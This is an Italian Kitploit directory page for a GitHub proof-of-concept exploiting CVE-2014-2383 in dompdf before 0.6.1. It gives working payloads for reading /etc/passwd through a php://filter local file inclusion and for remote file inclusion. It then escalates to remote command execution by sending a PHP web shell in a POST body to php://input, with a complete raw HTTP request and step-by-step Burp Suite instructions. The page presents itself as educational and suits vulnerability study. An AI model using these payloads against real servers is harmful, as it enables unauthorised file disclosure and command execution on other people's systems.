Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-2383-LFI-to-RCE-Escalation — Exploit proof-of-concept per CVE-2014-2383 che dimostra l'escalation da LFI/RFI a RCE in dompdf <0.6.1, con guida di riproduzione passo-passo e script di automazione. | Kitploit
Strumenti/GitHubGitHub/relativ3pa1n/cve-2014-2383-lfi-to-rce-escalation
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubrelativ3pa1n/cve-2014-2383-lfi-to-rce-escalation

CVE-2014-2383-LFI-to-RCE-Escalation

Exploit proof-of-concept per CVE-2014-2383 che dimostra l'escalation da LFI/RFI a RCE in dompdf <0.6.1, con guida di riproduzione passo-passo e script di automazione.

Vedi Repository
133 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2014-2383 escalation da LFI/RFI a RCE

Ambiente di test: dompdf 0.6.0 - php 7.3.33 - apache 2.4.25

Durante un security assessment è stata rilevata la presenza di CVE-2014-2383. Questo documento è una proof of concept e non include i dettagli della scoperta iniziale per tutelare la privacy del cliente. Il contenuto di questo documento replica comunque l'ambiente in cui questa vulnerabilità è stata sfruttata.

Scoperta https://github.com/projectdiscovery/nuclei

Dettagli di CVE-2014-2383

root@kitploit:~
A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.

Osserva il wrapper PHP php://filter/resource utilizzato per includere il file /etc/passwd dal target.

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd

Questo wrapper PHP non consentiva solo l'inclusione di file locali, ma anche di file remoti.

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=http://relativ3pa1n.com

Escalation a RCE

Fino a questo punto abbiamo utilizzato informazioni note e proof of concept per sfruttare queste vulnerabilità. Nel tentativo di spingere oltre lo sfruttamento di questa vulnerabilità, ho usato altri protocolli e filtri PHP per ottenere una sorta di "preprocessing" prima della creazione del PDF.

Una distinzione fondamentale in questa vulnerabilità LFI/RFI era che qualsiasi file referenziato nella LFI veniva renderizzato come documento PDF. Questo significava che tentare di renderizzare un file PHP tramite la LFI avrebbe solo convertito quel file in PDF e non avrebbe eseguito il PHP contenuto nel file. Osservando più da vicino il nostro payload, noteremo che php://filter/resource= è la parte del payload che aggira una restrizione imposta da DOMPDF.

Utilizzando un diverso filtro PHP, siamo in grado di fare in modo che il server preprocessi una richiesta POST prima di eseguire la LFI. Possiamo usare lo stream di input php://input per leggere i dati grezzi della nostra richiesta POST. Inoltre, possiamo aggiungere un parametro con il comando che vogliamo eseguire e definirlo nei nostri dati POST. Quindi il nostro nuovo parametro sarebbe qualcosa come php://input&cmd=id e i nostri dati POST sarebbero simili a <?php echo shell_exec($_GET[‘cmd’]);?> . Il risultato è mostrato di seguito.

Passaggi per la riproduzione

Naviga verso la LFI una volta individuata una versione di DOMPDF < 0.6.1

root@kitploit:~
{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd

Cattura questa richiesta in un proxy come BurpSuite

Invia la richiesta a Repeater (ctrl+r)

Una volta che hai la richiesta in Repeater, fai clic con il tasto destro sulla richiesta e seleziona "Change Request Method"

modifica il parametro input_file:

root@kitploit:~
From:
php://filter/resource=/etc/passwd
To:
php://input&cmd=whoami

Aggiungi questo al corpo della richiesta POST: (A volte è necessario riscrivere gli apici singoli)

root@kitploit:~
<?php echo shell_exec($_GET['cmd']);?>

L'intera richiesta dovrebbe apparire più o meno così:

root@kitploit:~
POST /dompdf/dompdf.php?input_file=php://input&cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=3369f6e27b5a514fb12c7bac74f8b11e
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

<?php echo shell_exec($_GET['cmd']);?>

Se stai usando BurpSuite, invia la richiesta e poi usa la barra di ricerca per cercare "BT". Osserva che il comando è stato eseguito e la risposta viene scritta nei dati a livello di byte del PDF che si sta tentando di generare. (In questo caso l'utente è "daemon")

Ho preparato uno script Python che può automatizzare gran parte di questo processo.

Disclaimer: Questo è solo a scopo educativo. Lascia in pace i server web degli altri. 😄

Ecco il link al video non in elenco della RCE. Video

Scarica lo strumento